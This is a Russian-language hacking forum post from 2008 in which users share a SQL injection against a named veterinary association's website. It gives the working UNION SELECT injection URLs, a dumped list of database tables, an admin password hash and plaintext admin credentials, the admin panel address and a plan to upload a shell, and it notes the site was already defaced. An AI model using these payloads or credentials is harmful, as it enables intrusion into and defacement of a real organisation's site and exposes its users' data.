28.07.2008, 06:47
|
|
Постоянный
Регистрация: 05.05.2008
Сообщений: 403
Провел на форуме:
2375039
Репутация:
1160
|
|
Сообщение от Bonnie and Clyde
Ассоциация Практикующих Ветеринарных Врачей // ТИЦ=40 PR=5
Код:
http://www.rsava.org/index.php?cat=54&news_id=-9999999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/*
Bonnie and Clyde
Код:
http://www.rsava.org/index.php?cat=54&news_id=-9999999+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12,13,14+from+information_schema.tables/*
TABLES:
article
banner
behaviour
blocks
calculation_articles
config
cost_articles
currensy
data_rassylka
doctors
faq
gallery_image
gallery_moduls
gallery_partition
gallery_people
gradation_execution_order
img_article
language
log
models
moduls
news
partition
rassylka
sale_on_rebate_percent
sclad
sidv_ban
sidv_cenzor
sidv_config
sidv_downloads
sidv_downloads_categoryes
sidv_downloads_comments
sidv_hqfaq
sidv_members
sidv_members_groups
sidv_members_in_groups
sidv_members_users
sidv_memrpass
sidv_modules
sidv_sessions
sidv_smiles
sidv_user
sidv_user_logs
sidv_zones
signs
time_table
user
user_outside
vote
vote_statistic
zakazy
news_file
phpbb_auth_access
phpbb_banlist
phpbb_categories
phpbb_config
phpbb_confirm
phpbb_disallow
phpbb_forum_prune
phpbb_forums
phpbb_groups
phpbb_posts
phpbb_posts_text
phpbb_privmsgs
phpbb_privmsgs_text
phpbb_ranks
phpbb_search_results
phpbb_search_wordlist
phpbb_search_wordmatch
phpbb_sessions
phpbb_sessions_keys
phpbb_smilies
phpbb_themes
phpbb_themes_name
phpbb_topics
phpbb_topics_watch
phpbb_user_group
phpbb_users
phpbb_vote_desc
phpbb_vote_results
phpbb_vote_voters
phpbb_words
aqualung:e05cbba9cd092521901a26346a0e5f3f
то есть можно залить шелл через админку если хэш крякнуть
------
Есть админка:
таблица user:
root:zakryto_cossa
kot:kot
Я как рут увидал сразу понял куда впихать этот пасс
_http://www.rsava.org/admin/
------
Турецкий хекер уже задефейсил(то есть через день,вот падальщики )))
Последний раз редактировалось DDoSька; 28.07.2008 в 21:58..
|
|
|